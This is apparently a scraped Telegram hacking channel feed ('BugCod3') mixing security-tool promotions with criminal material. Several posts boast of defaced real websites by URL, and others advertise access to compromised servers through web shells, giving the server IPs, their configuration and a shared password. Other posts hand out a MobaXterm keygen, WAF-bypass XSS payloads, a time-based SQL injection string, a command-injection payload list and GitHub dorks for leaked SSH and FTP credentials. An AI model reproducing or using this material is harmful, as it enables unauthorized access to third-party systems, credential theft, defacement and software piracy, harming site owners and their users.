BugCod3
7.26K subscribers
334 photos
6 videos
7 files
445 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
🌐 Bypass login authentication 🌐

⬇️ Download
πŸ”’ BugCod3

#Bypass #Login #Page #Authentication
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
7❀‍πŸ”₯2⚑1❀1πŸ‘1
πŸ«₯ MobaXterm Keygen πŸ”˜

⚠️ Please see source code. It is not complex. ⚠️

I don't know how to make custom settings take effect in Customizer mode directly.

πŸ’¬
The only way I found is that you should export custom settings to a file named MobaXterm customization.custom which is also a zip file. Then merge two zip file: Custom.mxtpro and MobaXterm customization.custom to Custom.mxtpro. Finally copy newly-generated Custom.mxtpro to MobaXterm's installation path.

πŸ“Š Postscript:
βšͺ️ This application does not have complex activation algorithm and it is truly fantastic. So please pay for it if possible.

βšͺ️ The file generated, Custom.mxtpro, is actually a zip file and contains a text file, Pro.key, where there is a key string.

βšͺ️ MobaXterm.exe has another mode. You can see it by adding a parameter "-customizer".
./MobaXterm.exe -customizer


πŸ’» Usage:
./MobaXterm-Keygen.py "DoubleSine" 10.9


😸 Github

⬇️ Donwload
πŸ”’ BugCod3

#Python #MobaXterm #Keygen #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
6⚑1❀1
The new cs.github.com search allows for regex, which means brand new regex GitHub Dorks are possible!

Eg, find SSH and FTP passwords via connection strings with:
/ssh:\/\/.*:.*@.*target\.com/
/ftp:\/\/.*:.*@.*target\.com/

#infosec #cybersecurite #bugbountytip
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
7⚑1❀1
πŸ”‘ LEAKEY πŸ”‘

LEAKEY is a bash script which checks and validates for leaked credentials. The idea behind LEAKEY is to make it highly customizable and easy to add checks for new services.

πŸ’¬
LEAKEY is a tool is for validation of leaked API tokens/keys found during pentesting and Red Team Enegagments.
The script is really useful for Bug Hunters inorder to validate and determine the impact of leaked credentials.

LEAKEY uses a json based signature file located at ~/.leakey/signatures.json
The idea behind LEAKEY is to make it highly customizable and easy to add new services/checks once they are discovered.

LEAKEY loads the services/check list via the signature file, if you wish to add more Checks/services, simply append it in the signatures.json file

πŸ‘€ Requirements:
βšͺ️ jq

πŸ”Ό Installation:
curl https://raw.githubusercontent.com/rohsec/LEAKEY/master/install.sh -o leaky_install.sh && chmod +x leaky_install.sh && bash leaky_install.sh


πŸ’» Usage:
After running the installation command, simply run the below in your terminal
leaky


πŸ“Š Adding Checks:
All the checks for LEAKEY are defined in the signatures.json file.
To add any new checks, simply appened the signatures file at ~/.leakey/signatures.json
{
"id": 0,
"name": "Slack API Token",
"args": [
"token"
],
"command": "curl -sX POST \"https://slack.com/api/auth.test?token=xoxp-$token&pretty=1\""
}


😸 Github

⬇️ Download
πŸ”’ BugCod3

#RedTeam #BugHunter #Leaked #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘4❀22⚑1
πŸ•Έ Site
πŸ‘β€πŸ—¨ Mirror-h

Country: πŸ‡ΊπŸ‡Έ

#Deface
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❀4⚑1πŸ”₯1
PHP: 7.0.33

Safe Mode: OFF

ServerIP: 208.109.13.219 [πŸ‡ΈπŸ‡¬]

HDD: Total:149.99 GB
Free:28.53 GB [19%]

Useful : gcc cc ld make php perl python ruby tar gzip nc

Downloader: wgetl ynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : OFF | Oracle : OFF | CGI : ON

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

πŸ”— Link
pwd: bugcod3

Enjoy... ⭐️

#Shell
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑1❀‍πŸ”₯1πŸ”₯1
Please open Telegram to view this post
VIEW IN TELEGRAM
❀‍πŸ”₯2⚑1πŸ”₯1
PHP: 8.2.15

Safe Mode: OFF

ServerIP: 50.116.94.196 [πŸ‡ΊπŸ‡Έ]

Domains: 428 domains

HDD: Total:393.53 GB
Free:21.53 GB [5%]

Useful : make php perl python ruby tar gzip nc

Downloader: wget lynx links curl lwp-mirror

Disable Functions: All Functions Accessible

CURL : ON | SSH2 : OFF | Magic Quotes : OFF | MySQL : ON | MSSQL : OFF | PostgreSQL : ON | Oracle : OFF | CGI : ON
Sole Sad & Invisible

Open_basedir : NONE | Safe_mode_exec_dir : NONE | Safe_mode_include_dir : NONE

SoftWare: Apache

πŸ”— Link

Enjoy... ⭐️

#Shell
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑1❀‍πŸ”₯1πŸ”₯1😒1
πŸ•Έ Site:
https://appie.ru/index.html
http://skupix.su/index.html
https://skupka-spb.ru/index.html
http://skypka.tv/index.html

πŸ‘β€πŸ—¨ Mirror-h

πŸ“Š Database

Country: πŸ‡·πŸ‡Ί

#Deface
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯3πŸ‘Ž2⚑1❀1
Bypass Cloudflare WAF (XSS without parentheses)

javascript:var{a:onerror}={a:alert};throw%20document.domain


#xss #bugbountytips #infosec
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑1❀1πŸ”₯1
Akamai WAF (new, requires a click to pop)

<A %252F=""Href= JavaScript:k='a',top[k%2B'lert'](1)>


Vector PoC

#XSS #Bypass
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑1❀1πŸ”₯1
🐱 SiCat 🐱

The useful exploit finder

πŸ’¬
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.

πŸ”Ό Installation:
pip  install  -r  requirements.txt


πŸ’» Usage:
python sicat.py --help


πŸ“‚ Example:
From keyword:
python sicat -k telerik --exploitdb --msfmodule

From nmap output:
nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Exploit #Metasploit #Finder
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2❀1πŸ‘1πŸ”₯1🐳1
πŸ”₯New Triaged report Sql Injection 😍 > Payload used time-based poc.

,%27%29%20AND%20%28SELECT%209683%20FROM%20%28SELECT%28SLEEP%285%29%29%29FKuq%29--%20wXyW


MySQL

#bugbountytip #infosec
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀2πŸ‘Ž2⚑1πŸ”₯1
πŸ•Έ Site:
http://kk-qq.work/index.html
https://comls.co.jp/BugCod3.html
http://comls.jp/BugCod3.html
http://hagakure.pro/index.html
http://tanpopo12.work/index.html
http://lanciaconstructora.com/

πŸ‘β€πŸ—¨ Mirror-h

Country: πŸ‡―πŸ‡΅πŸ‡ΊπŸ‡Έ

#Deface
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🐳2
Free Shell

πŸ”— Link

#Shell
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀3⚑1πŸ”₯1😍1🐳1
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑3πŸ”₯2❀1πŸ‘1
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag

javascript:var{a:onerror}={a:alert};throw%20document.domain

#bugbountytips #bugbounty
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2❀1πŸ”₯1
Command Injection Payload List

⬇️ Download

#Payload #Command #Injection
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑2❀1πŸ”₯1
☠️ xnLinkFinder v4.4 ☠️

πŸ’¬
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

πŸ“Š This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
βšͺ️ crawling a target (pass a domain/URL)
βšͺ️ crawling multiple targets (pass a file of domains/URLs)
βšͺ️ searching files in a given directory (pass a directory name)
βšͺ️ get them from a Burp project (pass location of a Burp XML file)
βšͺ️ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
βšͺ️ get them from a Caido project (pass location of a Caido export CSV file)
βšͺ️ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

πŸ”Ό Installation:
cd xnLinkFinder
sudo python setup.py install


πŸ’» Usage:
python xnLinkFinder.py --help


πŸ“‚ Examples:
#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com


😸 Github

⬇️ Donwload
πŸ”’ BugCod3

#Python #Discover #Endpoints
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘3⚑2πŸ”₯2❀1
NetProbe: Network Probe

πŸ’¬
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

πŸ“Š Features:
βšͺ️ Scan for devices on a specified IP address or subnet
βšͺ️ Display the IP address, MAC address, manufacturer, and device model of discovered devices
βšͺ️ Live tracking of devices (optional)
βšͺ️ Save scan results to a file (optional)
βšͺ️ Filter by manufacturer (e.g., 'Apple') (optional)
βšͺ️ Filter by IP range (e.g., '192.168.1.0/24') (optional)
βšͺ️ Scan rate in seconds (default: 5) (optional)

πŸ”Ό Installation:
cd NetProbe
pip install -r requirements.txt


πŸ’» Usage:
python3 netprobe.py β€”help


πŸ“‚ Example:
python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Network #Scanner #Vulnerability #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑4❀3πŸ”₯1